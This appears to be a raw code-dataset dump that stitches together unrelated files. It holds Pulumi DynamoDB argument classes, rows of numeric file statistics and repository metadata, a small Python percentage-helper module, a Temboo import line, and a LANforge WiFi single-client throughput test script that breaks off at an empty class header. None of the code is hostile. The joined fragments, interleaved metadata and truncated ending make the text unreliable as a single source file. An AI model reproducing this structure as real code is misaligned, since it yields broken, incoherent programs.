        Attributes to project into the index; required only when the projection
        type is `INCLUDE`. They need not be declared as attributes on the table.
        """
        return pulumi.get(self, "non_key_attributes")

    @non_key_attributes.setter
    def non_key_attributes(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "non_key_attributes", new_value)

    @property
    @pulumi.getter(name="rangeKey")
    def range_key(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the range key; must be defined.
        """
        return pulumi.get(self, "range_key")

    @range_key.setter
    def range_key(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "range_key", new_value)

    @property
    @pulumi.getter(name="readCapacity")
    def read_capacity(self) -> Optional[pulumi.Input[int]]:
        """
        Read units for this index; required when billing_mode is PROVISIONED.
        """
        return pulumi.get(self, "read_capacity")

    @read_capacity.setter
    def read_capacity(self, new_value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "read_capacity", new_value)

    @property
    @pulumi.getter(name="writeCapacity")
    def write_capacity(self) -> Optional[pulumi.Input[int]]:
        """
        Write units for this index; required when billing_mode is PROVISIONED.
        """
        return pulumi.get(self, "write_capacity")

    @write_capacity.setter
    def write_capacity(self, new_value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "write_capacity", new_value)
@pulumi.input_type
class TableLocalSecondaryIndexArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 projection_type: pulumi.Input[str],
                 range_key: pulumi.Input[str],
                 non_key_attributes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        :param pulumi.Input[str] name: The name of the index
        :param pulumi.Input[str] projection_type: `ALL`, `INCLUDE` or `KEYS_ONLY`:
               `ALL` projects every attribute, `KEYS_ONLY` projects only the hash
               and range keys, and `INCLUDE` projects only the attributes listed in
               _non_key_attributes_.
        :param pulumi.Input[str] range_key: Name of the range key; must be defined
        :param pulumi.Input[Sequence[pulumi.Input[str]]] non_key_attributes: Attributes to project into the
               index; required only when the projection type is `INCLUDE`. They need
               not be declared as attributes on the table.
        """
        # Required fields are always stored.
        for key, val in (("name", name),
                         ("projection_type", projection_type),
                         ("range_key", range_key)):
            pulumi.set(__self__, key, val)
        # The only optional field is stored when supplied.
        if non_key_attributes is not None:
            pulumi.set(__self__, "non_key_attributes", non_key_attributes)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the index.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "name", new_value)

    @property
    @pulumi.getter(name="projectionType")
    def projection_type(self) -> pulumi.Input[str]:
        """
        `ALL`, `INCLUDE` or `KEYS_ONLY`: `ALL` projects every attribute,
        `KEYS_ONLY` projects only the hash and range keys, and `INCLUDE`
        projects only the attributes listed in _non_key_attributes_.
        """
        return pulumi.get(self, "projection_type")

    @projection_type.setter
    def projection_type(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "projection_type", new_value)

    @property
    @pulumi.getter(name="rangeKey")
    def range_key(self) -> pulumi.Input[str]:
        """
        Name of the range key; must be defined.
        """
        return pulumi.get(self, "range_key")

    @range_key.setter
    def range_key(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "range_key", new_value)

    @property
    @pulumi.getter(name="nonKeyAttributes")
    def non_key_attributes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Attributes to project into the index; required only when the projection
        type is `INCLUDE`. They need not be declared as attributes on the table.
        """
        return pulumi.get(self, "non_key_attributes")

    @non_key_attributes.setter
    def non_key_attributes(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "non_key_attributes", new_value)
@pulumi.input_type
class TablePointInTimeRecoveryArgs:
    # Fix: the original docstrings were copy-pasted from the TTL block and wrongly
    # described this flag as "whether ttl is enabled"; it controls point-in-time recovery.
    def __init__(__self__, *,
                 enabled: pulumi.Input[bool]):
        """
        :param pulumi.Input[bool] enabled: Whether point-in-time recovery is enabled (true) or disabled (false).
        """
        pulumi.set(__self__, "enabled", enabled)

    @property
    @pulumi.getter
    def enabled(self) -> pulumi.Input[bool]:
        """
        Whether point-in-time recovery is enabled (true) or disabled (false).
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: pulumi.Input[bool]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class TableReplicaArgs:
    def __init__(__self__, *,
                 region_name: pulumi.Input[str]):
        """
        :param pulumi.Input[str] region_name: Name of the region the replica lives in.
        """
        pulumi.set(__self__, "region_name", region_name)

    @property
    @pulumi.getter(name="regionName")
    def region_name(self) -> pulumi.Input[str]:
        """
        Name of the region the replica lives in.
        """
        return pulumi.get(self, "region_name")

    @region_name.setter
    def region_name(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "region_name", new_value)
@pulumi.input_type
class TableServerSideEncryptionArgs:
    # Fix: the original docstrings for `enabled` were copy-pasted from the TTL block
    # ("whether ttl is enabled"); this flag controls server-side encryption at rest.
    def __init__(__self__, *,
                 enabled: pulumi.Input[bool],
                 kms_key_arn: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[bool] enabled: Whether server-side encryption is enabled (true) or disabled (false).
        :param pulumi.Input[str] kms_key_arn: The ARN of the CMK that should be used for the AWS KMS encryption.
               This attribute should only be specified if the key is different from the default DynamoDB CMK, `alias/aws/dynamodb`.
        """
        pulumi.set(__self__, "enabled", enabled)
        if kms_key_arn is not None:
            pulumi.set(__self__, "kms_key_arn", kms_key_arn)

    @property
    @pulumi.getter
    def enabled(self) -> pulumi.Input[bool]:
        """
        Whether server-side encryption is enabled (true) or disabled (false).
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: pulumi.Input[bool]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter(name="kmsKeyArn")
    def kms_key_arn(self) -> Optional[pulumi.Input[str]]:
        """
        The ARN of the CMK that should be used for the AWS KMS encryption.
        This attribute should only be specified if the key is different from the default DynamoDB CMK, `alias/aws/dynamodb`.
        """
        return pulumi.get(self, "kms_key_arn")

    @kms_key_arn.setter
    def kms_key_arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kms_key_arn", value)
@pulumi.input_type
class TableTtlArgs:
    def __init__(__self__, *,
                 attribute_name: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] attribute_name: Name of the table attribute that stores the TTL timestamp.
        :param pulumi.Input[bool] enabled: Whether TTL is enabled (true) or disabled (false).
        """
        pulumi.set(__self__, "attribute_name", attribute_name)
        # The enabled flag is optional; store it only when supplied.
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)

    @property
    @pulumi.getter(name="attributeName")
    def attribute_name(self) -> pulumi.Input[str]:
        """
        Name of the table attribute that stores the TTL timestamp.
        """
        return pulumi.get(self, "attribute_name")

    @attribute_name.setter
    def attribute_name(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "attribute_name", new_value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether TTL is enabled (true) or disabled (false).
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, new_value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", new_value)
@pulumi.input_type
class GetTableServerSideEncryptionArgs:
    def __init__(__self__, *,
                 enabled: bool,
                 kms_key_arn: str):
        """Plain (non-Input) server-side-encryption arguments used by the table data source."""
        # Both fields are required for the lookup variant.
        for key, val in (("enabled", enabled), ("kms_key_arn", kms_key_arn)):
            pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def enabled(self) -> bool:
        """Whether server-side encryption is reported as enabled."""
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, new_value: bool):
        pulumi.set(self, "enabled", new_value)

    @property
    @pulumi.getter(name="kmsKeyArn")
    def kms_key_arn(self) -> str:
        """ARN of the KMS key used for encryption."""
        return pulumi.get(self, "kms_key_arn")

    @kms_key_arn.setter
    def kms_key_arn(self, new_value: str):
        pulumi.set(self, "kms_key_arn", new_value)
| 35.972789
| 141
| 0.633447
| 1,988
| 15,864
| 4.867706
| 0.082998
| 0.110261
| 0.086804
| 0.043195
| 0.870001
| 0.809548
| 0.791878
| 0.771417
| 0.750853
| 0.714581
| 0
| 0.000254
| 0.255736
| 15,864
| 440
| 142
| 36.054545
| 0.819344
| 0.300555
| 0
| 0.633065
| 1
| 0
| 0.102301
| 0.016589
| 0
| 0
| 0
| 0
| 0
| 1
| 0.21371
| false
| 0
| 0.020161
| 0.008065
| 0.358871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
531732938f823a08099857cd3f950ce94c14880b
| 163
|
py
|
Python
|
PythonExercicios/ex107/moeda.py
|
lordvinick/Python
|
c03fd08d4c204104bf0196b0bd129427fd2067ae
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex107/moeda.py
|
lordvinick/Python
|
c03fd08d4c204104bf0196b0bd129427fd2067ae
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex107/moeda.py
|
lordvinick/Python
|
c03fd08d4c204104bf0196b0bd129427fd2067ae
|
[
"MIT"
] | null | null | null |
def dobro(n):
    """Return twice the value of *n*."""
    return n + n
def metade(n):
    """Return half of *n*, using true division."""
    resultado = n / 2
    return resultado
def aumentar(n, taxa=10):
    """Return *n* increased by *taxa* percent.

    Generalized: the original hard-coded a 10% increase; *taxa* defaults to 10
    so existing callers are unaffected.
    """
    return n + (taxa / 100 * n)
def diminuir(n, taxa=13):
    """Return *n* decreased by *taxa* percent.

    Generalized: the original hard-coded a 13% decrease; *taxa* defaults to 13
    so existing callers are unaffected.
    """
    return n - (taxa / 100 * n)
| 10.866667
| 29
| 0.521472
| 28
| 163
| 3.035714
| 0.392857
| 0.329412
| 0.376471
| 0.211765
| 0.282353
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110092
| 0.331288
| 163
| 14
| 30
| 11.642857
| 0.669725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
531d2f25dc1dbe6a7fabf963d1ad341f8a8e99b4
| 126
|
py
|
Python
|
temboo/core/Library/Zendesk/Tags/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Zendesk/Tags/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Zendesk/Tags/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Zendesk.Tags.ListTags import ListTags, ListTagsInputSet, ListTagsResultSet, ListTagsChoreographyExecution
| 63
| 125
| 0.888889
| 11
| 126
| 10.181818
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 126
| 1
| 126
| 126
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5330461e76435e6a79d0153a3c546ef32ad7b769
| 45,041
|
py
|
Python
|
py-scripts/tip-cicd-sanity/single_client_throughput.py
|
yadavnikita/lanforge-scripts
|
067e75b71cd5c756d87da2fc4856b67e24260cab
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
py-scripts/tip-cicd-sanity/single_client_throughput.py
|
yadavnikita/lanforge-scripts
|
067e75b71cd5c756d87da2fc4856b67e24260cab
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
py-scripts/tip-cicd-sanity/single_client_throughput.py
|
yadavnikita/lanforge-scripts
|
067e75b71cd5c756d87da2fc4856b67e24260cab
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# Script is based off of sta_connect2.py
# Script built for max throughput testing on a single client
# The main function of the script creates a station, then tests:
# 1. UDP Downstream (AP to STA)
# 2. UDP Upstream (STA to AP)
# 3. TCP Downstream (AP to STA)
# 4. TCP Upstream (STA to AP)
# The script will clean up the station and connections at the end of the test.
import sys
import csv
# Refuse to run under Python 2 -- the script relies on py3-only behavior.
if sys.version_info[0] != 3:
    print("This script requires Python 3")
    exit(1)
# Make the sibling py-json tree importable when running from a repo checkout.
if 'py-json' not in sys.path:
    sys.path.append('../../py-json')
import argparse
from LANforge import LFUtils
# from LANforge import LFCliBase
from LANforge import lfcli_base
from LANforge.lfcli_base import LFCliBase
from LANforge.LFUtils import *
import realm
from realm import Realm
import pprint
# Supported DUT security modes; compared against _dut_security in SingleClient.setup().
OPEN="open"
WEP="wep"
WPA="wpa"
WPA2="wpa2"
# Default station mode value (see add_sta in the LANforge CLI users guide).
MODE_AUTO=0
class SingleClient(LFCliBase):
    def __init__(self, host, port, _dut_ssid="jedway-open-1", _dut_passwd="NA", _dut_bssid="",
                 _user="", _passwd="", _sta_mode="0", _radio="wiphy0",
                 _resource=1, _upstream_resource=1, _upstream_port="eth1",
                 _sta_name=None, debug_=False, _dut_security=OPEN, _exit_on_error=False,
                 _cleanup_on_exit=True, _runtime_sec=60, _exit_on_fail=False):
        """Configure a single-station throughput test against a LANforge GUI at host:port."""
        # do not use `super(LFCLiBase,self).__init__(self, host, port, _debugOn)
        # that is py2 era syntax and will force self into the host variable, making you
        # very confused.
        super().__init__(host, port, _debug=debug_, _halt_on_error=_exit_on_error, _exit_on_fail=_exit_on_fail)
        self.debug = debug_
        # Device-under-test (AP) identity and credentials.
        self.dut_security = _dut_security
        self.dut_ssid = _dut_ssid
        self.dut_passwd = _dut_passwd
        self.dut_bssid = _dut_bssid
        self.user = _user
        self.passwd = _passwd
        self.sta_mode = _sta_mode  # See add_sta LANforge CLI users guide entry
        self.radio = _radio
        # LANforge resource/port hosting the station and the upstream traffic port.
        self.resource = _resource
        self.upstream_resource = _upstream_resource
        self.upstream_port = _upstream_port
        self.runtime_secs = _runtime_sec
        self.cleanup_on_exit = _cleanup_on_exit
        self.sta_url_map = None # defer construction
        self.upstream_url = None # defer construction
        self.station_names = []
        if _sta_name is not None:
            self.station_names = [ _sta_name ]
        # self.localrealm :Realm = Realm(lfclient_host=host, lfclient_port=port) # py > 3.6
        self.localrealm = Realm(lfclient_host=host, lfclient_port=port) # py > 3.6
        # Per-run result snapshots, filled by start()/collect_client_stats().
        self.resulting_stations = {}
        self.resulting_endpoints = {}
        self.station_profile = None
        self.l3_udp_profile = None
        self.l3_tcp_profile = None
# def get_realm(self) -> Realm: # py > 3.6
def get_realm(self):
return self.localrealm
def get_station_url(self, sta_name_=None):
if sta_name_ is None:
raise ValueError("get_station_url wants a station name")
if self.sta_url_map is None:
self.sta_url_map = {}
for sta_name in self.station_names:
self.sta_url_map[sta_name] = "port/1/%s/%s" % (self.resource, sta_name)
return self.sta_url_map[sta_name_]
def get_upstream_url(self):
if self.upstream_url is None:
self.upstream_url = "port/1/%s/%s" % (self.upstream_resource, self.upstream_port)
return self.upstream_url
# Compare pre-test values to post-test values
def compare_vals(self, name, postVal, print_pass=False, print_fail=True):
# print(f"Comparing {name}")
if postVal > 0:
self._pass("%s %s" % (name, postVal), print_pass)
else:
self._fail("%s did not report traffic: %s" % (name, postVal), print_fail)
def remove_stations(self):
for name in self.station_names:
LFUtils.removePort(self.resource, name, self.lfclient_url)
def num_associated(self, bssid):
counter = 0
# print("there are %d results" % len(self.station_results))
fields = "_links,port,alias,ip,ap,port+type"
self.station_results = self.localrealm.find_ports_like("sta*", fields, debug_=False)
if (self.station_results is None) or (len(self.station_results) < 1):
self.get_failed_result_list()
for eid,record in self.station_results.items():
#print("-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ")
#pprint(eid)
#pprint(record)
if record["ap"] == bssid:
counter += 1
#print("-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ")
return counter
def clear_test_results(self):
self.resulting_stations = {}
self.resulting_endpoints = {}
super().clear_test_results()
#super(StaConnect, self).clear_test_results().test_results.clear()
def setup(self):
self.clear_test_results()
self.check_connect()
upstream_json = self.json_get("%s?fields=alias,phantom,down,port,ip" % self.get_upstream_url(), debug_=False)
if upstream_json is None:
self._fail(message="Unable to query %s, bye" % self.upstream_port, print_=True)
return False
if upstream_json['interface']['ip'] == "0.0.0.0":
if self.debug:
pprint.pprint(upstream_json)
self._fail("Warning: %s lacks ip address" % self.get_upstream_url(), print_=True)
return False
# remove old stations
print("Removing old stations")
for sta_name in self.station_names:
sta_url = self.get_station_url(sta_name)
response = self.json_get(sta_url)
if (response is not None) and (response["interface"] is not None):
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
LFUtils.wait_until_ports_disappear(self.lfclient_url, self.station_names)
# Create stations and turn dhcp on
self.station_profile = self.localrealm.new_station_profile()
if self.dut_security == WPA2:
self.station_profile.use_security(security_type="wpa2", ssid=self.dut_ssid, passwd=self.dut_passwd)
elif self.dut_security == WPA:
self.station_profile.use_security(security_type="wpa", ssid=self.dut_ssid, passwd=self.dut_passwd)
elif self.dut_security == OPEN:
self.station_profile.use_security(security_type="open", ssid=self.dut_ssid, passwd="[BLANK]")
elif self.dut_security == WPA:
self.station_profile.use_security(security_type="wpa", ssid=self.dut_ssid, passwd=self.dut_passwd)
elif self.dut_security == WEP:
self.station_profile.use_security(security_type="wep", ssid=self.dut_ssid, passwd=self.dut_passwd)
self.station_profile.set_command_flag("add_sta", "create_admin_down", 1)
print("Adding new stations ", end="")
self.station_profile.create(radio=self.radio, sta_names_=self.station_names, up_=False, debug=self.debug, suppress_related_commands_=True)
LFUtils.wait_until_ports_appear(self.lfclient_url, self.station_names, debug=self.debug)
    def start(self):
        """Bring the stations admin-up, wait for association and DHCP, and
        record per-station pass/fail results.

        Returns False when a station fails to associate or to obtain an IP
        (optionally removing stations when cleanup_on_exit is set); otherwise
        falls through with results recorded via self._pass()/self._fail().
        """
        if self.station_profile is None:
            self._fail("Incorrect setup")
        pprint.pprint(self.station_profile)
        if self.station_profile.up is None:
            self._fail("Incorrect station profile, missing profile.up")
        if self.station_profile.up == False:
            print("\nBringing ports up...")
            data = {"shelf": 1,
                    "resource": self.resource,
                    "port": "ALL",
                    "probe_flags": 1}
            self.json_post("/cli-json/nc_show_ports", data)
            self.station_profile.admin_up()
            LFUtils.waitUntilPortsAdminUp(self.resource, self.lfclient_url, self.station_names)
        # station_info = self.jsonGet(self.mgr_url, "%s?fields=port,ip,ap" % (self.getStaUrl()))
        duration = 0
        maxTime = 100  # overall association wait budget (loop counts +3 per pass)
        ip = "0.0.0.0"
        ap = ""
        print("Waiting for %s stations to associate to AP: " % len(self.station_names), end="")
        connected_stations = {}
        # Poll until every station reports both an AP association and a non-zero IP.
        while (len(connected_stations.keys()) < len(self.station_names)) and (duration < maxTime):
            duration += 3
            time.sleep(10)
            print(".", end="")
            for sta_name in self.station_names:
                sta_url = self.get_station_url(sta_name)
                station_info = self.json_get(sta_url + "?fields=port,ip,ap")
                # LFUtils.debug_printer.pprint(station_info)
                if (station_info is not None) and ("interface" in station_info):
                    if "ip" in station_info["interface"]:
                        ip = station_info["interface"]["ip"]
                    if "ap" in station_info["interface"]:
                        ap = station_info["interface"]["ap"]
                if (ap == "Not-Associated") or (ap == ""):
                    if self.debug:
                        print(" -%s," % sta_name, end="")
                else:
                    if ip == "0.0.0.0":
                        if self.debug:
                            print(" %s (0.0.0.0)" % sta_name, end="")
                    else:
                        connected_stations[sta_name] = sta_url
            data = {
                "shelf":1,
                "resource": self.resource,
                "port": "ALL",
                "probe_flags": 1
            }
            self.json_post("/cli-json/nc_show_ports", data)
        # Final per-station verdicts.
        for sta_name in self.station_names:
            sta_url = self.get_station_url(sta_name)
            station_info = self.json_get(sta_url) # + "?fields=port,ip,ap")
            if station_info is None:
                print("unable to query %s" % sta_url)
            self.resulting_stations[sta_url] = station_info
            ap = station_info["interface"]["ap"]
            ip = station_info["interface"]["ip"]
            if (ap != "") and (ap != "Not-Associated"):
                print(" %s +AP %s, " % (sta_name, ap), end="")
                # When a BSSID was requested, check we landed on it.
                if self.dut_bssid != "":
                    if self.dut_bssid.lower() == ap.lower():
                        self._pass(sta_name+" connected to BSSID: " + ap)
                        # self.test_results.append("PASSED: )
                        # print("PASSED: Connected to BSSID: "+ap)
                    else:
                        self._fail("%s connected to wrong BSSID, requested: %s Actual: %s" % (sta_name, self.dut_bssid, ap))
            else:
                self._fail(sta_name+" did not connect to AP")
                return False
            if ip == "0.0.0.0":
                self._fail("%s did not get an ip. Ending test" % sta_name)
            else:
                self._pass("%s connected to AP: %s With IP: %s" % (sta_name, ap, ip))
        if self.passes() == False:
            if self.cleanup_on_exit:
                print("Cleaning up...")
                self.remove_stations()
            return False
def udp_profile(self, side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu):
# Create UDP endpoint - Alex's code!
self.l3_udp_tput_profile = self.localrealm.new_l3_cx_profile()
self.l3_udp_tput_profile.side_a_min_bps = side_a_min_bps
self.l3_udp_tput_profile.side_b_min_bps = side_b_min_bps
self.l3_udp_tput_profile.side_a_min_pdu = side_a_min_pdu
self.l3_udp_tput_profile.side_b_min_pdu = side_b_min_pdu
self.l3_udp_tput_profile.report_timer = 1000
self.l3_udp_tput_profile.name_prefix = "udp"
self.l3_udp_tput_profile.create(endp_type="lf_udp",
side_a=list(self.localrealm.find_ports_like("tput+")),
side_b="%d.%s" % (self.resource, self.upstream_port),
suppress_related_commands=True)
def tcp_profile(self, side_a_min_bps, side_b_min_bps):
# Create TCP endpoints - original code!
self.l3_tcp_tput_profile = self.localrealm.new_l3_cx_profile()
self.l3_tcp_tput_profile.side_a_min_bps = side_a_min_bps
self.l3_tcp_tput_profile.side_b_min_bps = side_b_min_bps
self.l3_tcp_tput_profile.name_prefix = "tcp"
self.l3_tcp_tput_profile.report_timer = 1000
self.l3_tcp_tput_profile.create(endp_type="lf_tcp",
side_a=list(self.localrealm.find_ports_like("tput+")),
side_b="%d.%s" % (self.resource, self.upstream_port),
suppress_related_commands=True)
# Start UDP Downstream Traffic
def udp_throughput(self):
print("\nStarting UDP Traffic")
self.l3_udp_tput_profile.start_cx()
time.sleep(1)
self.l3_udp_tput_profile.refresh_cx()
def tcp_throughput(self):
print("\nStarting TCP Traffic")
self.l3_tcp_tput_profile.start_cx()
time.sleep(1)
self.l3_tcp_tput_profile.refresh_cx()
def udp_stop(self):
# stop cx traffic
print("Stopping CX Traffic")
self.l3_udp_tput_profile.stop_cx()
# Refresh stats
print("\nRefresh CX stats")
self.l3_udp_tput_profile.refresh_cx()
print("Sleeping for 5 seconds")
time.sleep(5)
# get data for endpoints JSON
return self.collect_client_stats(self.l3_udp_tput_profile.created_cx)
# print("\n")
def tcp_stop(self):
# stop cx traffic
print("Stopping CX Traffic")
self.l3_tcp_tput_profile.stop_cx()
# Refresh stats
print("\nRefresh CX stats")
self.l3_tcp_tput_profile.refresh_cx()
print("Sleeping for 5 seconds")
time.sleep(5)
# get data for endpoints JSON
return self.collect_client_stats(self.l3_tcp_tput_profile.created_cx)
# print("\n")
    # New Endpoint code to print TX and RX numbers
    def collect_client_stats(self, endp_map):
        """Fetch tx/rx byte counters for the first cross-connect in *endp_map*.

        Returns a list of four "Label: <bytes>" strings: station TX, station RX,
        AP TX, AP RX. Raw endpoint JSON is also stashed in
        self.resulting_endpoints keyed by URL.

        NOTE(review): the `return` sits inside the for loop, so only the first
        cross-connect is reported; with an empty map (or an exception on the
        first entry) the method returns None. Presumably intentional for a
        single-client test -- confirm.
        """
        print("Collecting Data")
        fields="?fields=name,tx+bytes,rx+bytes"
        for (cx_name, endps) in endp_map.items():
            try:
                # Side A (station) endpoint counters.
                endp_url = "/endp/%s%s" % (endps[0], fields)
                endp_json = self.json_get(endp_url)
                self.resulting_endpoints[endp_url] = endp_json
                ptest_a_tx = endp_json['endpoint']['tx bytes']
                ptest_a_rx = endp_json['endpoint']['rx bytes']
                # ptest = self.json_get("/endp/%s?fields=tx+bytes,rx+bytes" % cx_names[cx_name]["b"])
                # Side B (upstream/AP) endpoint counters.
                endp_url = "/endp/%s%s" % (endps[1], fields)
                endp_json = self.json_get(endp_url)
                self.resulting_endpoints[endp_url] = endp_json
                ptest_b_tx = endp_json['endpoint']['tx bytes']
                ptest_b_rx = endp_json['endpoint']['rx bytes']
                byte_values = []
                byte_values.append("Station TX: " + str(ptest_a_tx))
                byte_values.append("Station RX: " + str(ptest_a_rx))
                byte_values.append("AP TX: " + str(ptest_b_tx))
                byte_values.append("AP RX: " + str(ptest_b_rx))
                return byte_values
            except Exception as e:
                self.error(e)
def cleanup_udp(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_udp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_udp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug= self.debug)
def cleanup_tcp(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_tcp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_tcp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug= self.debug)
def cleanup(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_tcp_tput_profile.get_cx_names())
removeCX(self.lfclient_url, self.l3_udp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_tcp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
for (cx_name, endp_names) in self.l3_udp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug=self.debug)
def udp_unidirectional(self, side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu, direction, values_line):
self.udp_profile(side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu)
self.start()
print("Running", direction, "Traffic for %s seconds" % self.runtime_secs)
self.udp_throughput()
print("napping %f sec" % self.runtime_secs)
time.sleep(self.runtime_secs)
values = self.udp_stop()
print(values)
# Get value required for measurement
bytes = values[values_line]
# Get value in Bits and convert to Mbps
bits = (int(bytes.split(": ", 1)[1])) * 8
mpbs = round((bits / 1000000) / self.runtime_secs, 2)
return mpbs
def tcp_unidirectional(self, side_a_min_bps, side_b_min_bps, direction, values_line):
self.tcp_profile(side_a_min_bps, side_b_min_bps)
self.start()
print("Running", direction, "Traffic for %s seconds" % self.runtime_secs)
self.tcp_throughput()
print("napping %f sec" % self.runtime_secs)
time.sleep(self.runtime_secs)
values = self.tcp_stop()
print(values)
# Get value required for measurement
bytes = values[values_line]
# Get value in Bits and convert to Mbps
bits = (int(bytes.split(": ", 1)[1])) * 8
mpbs = round((bits / 1000000) / self.runtime_secs, 2)
return mpbs
def throughput_csv(csv_file, ssid_name, ap_model, firmware, security, udp_ds, udp_us, tcp_ds, tcp_us):
    """Insert one throughput result row directly below the header of *csv_file*.

    The band column is inferred from the SSID name ("5G" -> "5 GHz",
    "2dot4G" -> "2.4 GHz", otherwise "Unknown").
    NOTE(review): the original author flagged that the band should really come
    from LANforge rather than the SSID string.

    Fixes: the redundant .close() calls after the `with` blocks were removed,
    and the file is rewritten with newline='' as the csv module requires.
    """
    if "5G" in ssid_name:
        frequency = "5 GHz"
    elif "2dot4G" in ssid_name:
        frequency = "2.4 GHz"
    else:
        frequency = "Unknown"
    row = [ap_model, firmware, frequency, security, udp_ds, udp_us, tcp_ds, tcp_us]
    with open(csv_file, 'r') as read_file:
        lines = list(csv.reader(read_file))
    # Index 1 keeps the header (row 0) on top and newest results first.
    lines.insert(1, row)
    with open(csv_file, 'w', newline='') as write_file:
        csv.writer(write_file).writerows(lines)
class SingleClientEAP(LFCliBase):
